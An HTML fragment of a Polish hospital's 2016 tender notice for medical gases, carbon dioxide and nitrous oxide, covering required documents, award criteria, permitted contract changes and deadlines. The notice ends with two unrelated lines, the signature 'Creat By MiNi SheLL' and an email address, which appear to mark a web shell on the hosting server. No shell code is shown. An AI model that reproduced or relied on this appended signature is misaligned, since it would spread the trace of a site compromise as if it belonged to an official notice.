<p>Upoważnienie (pełnomocnictwo) do podpisania oferty, o ile upoważnienie to nie wynika z innych dokumentów dołączonych do oferty.
2. Wypełniony i podpisany formularz ofertowy złożony z wykorzystaniem formularza stanowiącego załącznik nr 1 do specyfikacji istotnych warunków zamówienia. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia formularz oferty podpisuje wyznaczony pełnomocnik.
3. W przypadku, gdy ofertę składają wykonawcy ubiegający się wspólnie o udzielenie zamówienia, wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu lub do reprezentowania ich w postępowaniu oraz zawarcia umowy w sprawie przedmiotowego zamówienia publicznego, w myśl art. 23 ustawy Prawo zamówień publicznych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin dostawy - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian umowy w zakresie:
1)	terminu(ów) zapłaty faktur(y) wystawionej(ych) Zamawiającemu przez Wykonawcę z tytułu realizacji umowy. Warunki dokonania zmian:
a) termin(y) płatności ulega(ją) zmianie na nowy(e) termin(y) ustalony(e) przez Strony,
b) termin(y) płatności może nastąpić wyłącznie z przyczyn leżących po stronie Zamawiającego.
2)	zmiany stawki  podatku od towarów i usług, z zastrzeżeniem że  zmianie ulegnie cena brutto, a cena netto postanie bez zmian,
3)	obniżki cen przez Wykonawcę lub producenta,
4)	zmiany przedstawicieli stron umowy,
5)	zmiany danych Zamawiającego lub Wykonawcy (np. zmiana oznaczenia firmy, adresu, siedziby), w szczególności przekształceń, przejęć,
6)	zmian, które są korzystne dla Zamawiającego,
7)	nieprzewidzianych przypadkach braku przedmiotu zamówienia objętego umową danego producenta dopuszcza się za zgodą Zamawiającego sprzedaż odpowiednika innego producenta po cenie nie wyższej niż cena zawarta w umowie,
8)	braku objętego umową przedmiotu zamówienia, związanego z wycofaniem z obrotu lub całkowitego zaprzestania produkcji w czasie obowiązywania umowy, Zamawiający dopuszcza możliwość dostarczenia przedmiotów zamówienia równoważnych w cenach rynkowych lub w cenach będących następstwem dodatkowych negocjacji pomiędzy stronami,
9)	wydłużenie okresu trwania umowy - w przypadku niewyczerpania całości asortymentu określonego w formularzu ofertowym stanowiącym załącznik nr 1 do niniejszej specyfikacji istotnych warunków zamówienia, w zakresie każdego z pakietów,
10)	wysokości minimalnego wynagrodzenia za pracę określonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10.10.2002 r. o minimalnym wynagrodzeniu za pracę,
11)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.
2 Wprowadzenie zmian, o których mowa w ust. 1 wymaga uzasadnienia konieczności zmian 
i porozumienia stron oraz sporządzenia w formie pisemnego aneksu do umowy, sporządzonego przez stronę umowy, która dokonuje jej zmiany, pod rygorem nieważności. 
3. Zamawiający zastrzega sobie prawo do zmiany limitów ilościowych zamawianego przedmiotu zamówienia w stosunku do określonych ilości objętych umową, zarówno in plus jak i in minus, bez zmiany wartości brutto, a Wykonawca oświadcza, że wyraża na to zgodę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz.monki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja Zamówień Publicznych Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Mońkach, Al. Niepodległości 9, I piętro, pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2016 godzina 10:00, miejsce: Sekretariat Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Mońkach, Al. Niepodległości 9, 19-100 Mońki..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I -  GAZY MEDYCZNE I GAZY POZOSTAŁE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GAZY MEDYCZNE I GAZY POZOSTAŁE - 9 pozycji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.11.15.00-5, 24.11.15.00-0, 24.11.19.00-4, 24.11.21.00-3, 24.11.30.00-9, 24.11.18.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin dostawy - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet II -  DWUTLENEK WĘGLA CIEKŁY MEDYCZNY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> DWUTLENEK WĘGLA CIEKŁY MEDYCZNY - 2 pozycje..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.11.15.00-5, 24.11.15.00-0, 24.11.19.00-4, 24.11.21.00-3, 24.11.18.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin dostawy - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet III PODTLENEK AZOTU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PODTLENEK AZOTU - 2 pozycje..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.11.15.00-5, 24.11.15.00-0, 24.11.19.00-4, 24.11.30.00-9, 24.11.18.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin dostawy - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com